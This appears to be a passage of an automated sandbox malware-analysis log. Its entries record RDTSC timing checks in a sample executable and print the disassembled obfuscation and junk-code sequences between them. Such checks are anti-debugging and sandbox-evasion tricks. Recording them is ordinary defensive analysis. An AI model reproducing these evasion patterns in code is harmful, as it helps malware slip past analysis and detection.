                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD8A5F second address: BD8A69 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1BB4E5F526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD9B89 second address: BD9B8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD9B8F second address: BD9BB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F1BB4E5F539h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BDCC17 second address: BDCC21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F1BB4D69EA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BDCC21 second address: BDCC8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F1BB4E5F533h 0x0000000e nop 0x0000000f jc 00007F1BB4E5F52Ch 0x00000015 mov dword ptr [ebp+122D26C2h], edx 0x0000001b push 00000000h 0x0000001d mov dword ptr [ebp+122D2927h], esi 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push eax 0x00000028 call 00007F1BB4E5F528h 0x0000002d pop eax 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 add dword ptr [esp+04h], 0000001Bh 0x0000003a inc eax 0x0000003b push eax 0x0000003c ret 0x0000003d pop eax 0x0000003e ret 0x0000003f xchg eax, esi 0x00000040 push ecx 0x00000041 jnl 00007F1BB4E5F52Ch 0x00000047 pop ecx 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BDCC8C second address: BDCC91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BDED42 second address: BDED46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BDDE3C second address: BDDE6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1BB4D69EB5h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BDED46 second address: BDED4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BDDE6B second address: BDDE71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BDF013 second address: BDF025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jne 00007F1BB4E5F526h 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BDF025 second address: BDF02B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BDF02B second address: BDF02F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BDF02F second address: BDF033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BE1C9F second address: BE1CA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BE1CA3 second address: BE1CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BE1CB6 second address: BE1CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BE1CBB second address: BE1CC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BE2BD2 second address: BE2BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C24B66 second address: C24B7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1BB4D69EB0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C24D0F second address: C24D33 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1BB4E5F52Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1BB4E5F52Ah 0x00000011 jp 00007F1BB4E5F52Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C24D33 second address: C24D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C24D39 second address: C24D4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4E5F531h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C252E7 second address: C25303 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F1BB4D69EAEh 0x0000000a pop esi 0x0000000b jo 00007F1BB4D69EACh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C28BBF second address: C28BC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C28BC5 second address: C28BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F1BB4D69EA8h 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C28D2D second address: C28D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C28D32 second address: C28D42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BB4D69EACh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C28E8E second address: C28EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F1BB4E5F526h 0x0000000d jmp 00007F1BB4E5F536h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C3054A second address: C30550 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C30550 second address: C30554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCCF45 second address: BCCF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCCF49 second address: BB5F48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F1BB4E5F528h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D2209h], esi 0x00000029 call dword ptr [ebp+122D21A7h] 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push ecx 0x00000034 pop ecx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C2F107 second address: C2F122 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F1BB4D69EA6h 0x00000009 jc 00007F1BB4D69EA6h 0x0000000f jo 00007F1BB4D69EA6h 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C2F122 second address: C2F128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C2F96B second address: C2F99A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1BB4D69EB6h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F1BB4D69EAFh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C2F99A second address: C2F99E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C2FC5D second address: C2FC6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 je 00007F1BB4D69EAEh 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C2FC6D second address: C2FC74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C2FF1C second address: C2FF29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C2FF29 second address: C2FF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jc 00007F1BB4E5F532h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C2FF38 second address: C2FF3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C2FF3E second address: C2FF45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C327F6 second address: C327FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C327FA second address: C32834 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4E5F52Eh 0x00000007 jmp 00007F1BB4E5F539h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1BB4E5F52Dh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C357A2 second address: C35811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1BB4D69EB1h 0x0000000b jmp 00007F1BB4D69EB2h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F1BB4D69EB8h 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pop edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e jmp 00007F1BB4D69EB2h 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F1BB4D69EB0h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C3595B second address: C35965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C35AEC second address: C35B0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EB5h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F1BB4D69EA6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C35C6A second address: C35C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jo 00007F1BB4E5F532h 0x0000000d jp 00007F1BB4E5F526h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C35C7F second address: C35CA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push esi 0x00000007 jmp 00007F1BB4D69EB9h 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C35CA8 second address: C35CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C35E18 second address: C35E28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EACh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C35E28 second address: C35E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C35FAD second address: C35FB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C35FB1 second address: C35FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C35FB7 second address: C35FBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C35FBD second address: C35FC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C362B4 second address: C362BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C362BA second address: C362C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C404E5 second address: C40512 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EB7h 0x00000007 jmp 00007F1BB4D69EACh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C4069C second address: C406BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4E5F536h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C406BB second address: C406C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C40983 second address: C40995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F1BB4E5F52Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C40995 second address: C409C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F1BB4D69EB8h 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f jns 00007F1BB4D69EA6h 0x00000015 popad 0x00000016 jp 00007F1BB4D69EACh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C40B12 second address: C40B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C40B16 second address: C40B45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F1BB4D69EAAh 0x0000000c pop ebx 0x0000000d popad 0x0000000e pushad 0x0000000f push edx 0x00000010 jnp 00007F1BB4D69EA6h 0x00000016 pop edx 0x00000017 jns 00007F1BB4D69EAEh 0x0000001d pushad 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C40B45 second address: C40B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C4109B second address: C410B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jnl 00007F1BB4D69EA6h 0x0000000f push eax 0x00000010 pop eax 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C410B3 second address: C410C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4E5F52Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C41337 second address: C4133D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C41A2A second address: C41A2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C41A2E second address: C41A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C41A34 second address: C41A3B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C3FFFE second address: C40003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C40003 second address: C40034 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1BB4E5F52Fh 0x00000008 jnp 00007F1BB4E5F526h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F1BB4E5F526h 0x00000017 jmp 00007F1BB4E5F530h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C40034 second address: C40048 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jo 00007F1BB4D69EA6h 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C40048 second address: C40051 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C40051 second address: C40071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BB4D69EADh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F1BB4D69EABh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C47B39 second address: C47B55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4E5F52Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C4ACD0 second address: C4ACDA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1BB4D69EA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C4A75A second address: C4A760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C57762 second address: C5776D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C578BE second address: C578C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C73F53 second address: C73F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BB4D69EB2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C73F69 second address: C73F6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C73F6D second address: C73F99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F1BB4D69EA6h 0x0000000d jns 00007F1BB4D69EA6h 0x00000013 popad 0x00000014 pop esi 0x00000015 jne 00007F1BB4D69EBCh 0x0000001b pushad 0x0000001c jmp 00007F1BB4D69EACh 0x00000021 push edx 0x00000022 pop edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C74F26 second address: C74F3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1BB4E5F52Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C7A317 second address: C7A31B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C7A31B second address: C7A34A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BB4E5F533h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1BB4E5F534h 0x00000012 rdtsc
